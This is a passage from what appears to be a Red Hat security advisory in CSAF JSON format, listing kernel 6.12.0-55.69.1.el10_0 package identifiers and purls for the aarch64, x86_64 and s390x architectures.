"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-64k-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-55.69.1.el10_0?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "rv-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-uki-virt@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-kvm@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-kvm@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-55.69.1.el10_0?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel-matched@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "perf-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "rtla-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "rv-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-55.69.1.el10_0?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"product": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"product_id": "kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"product_identification_helper": {
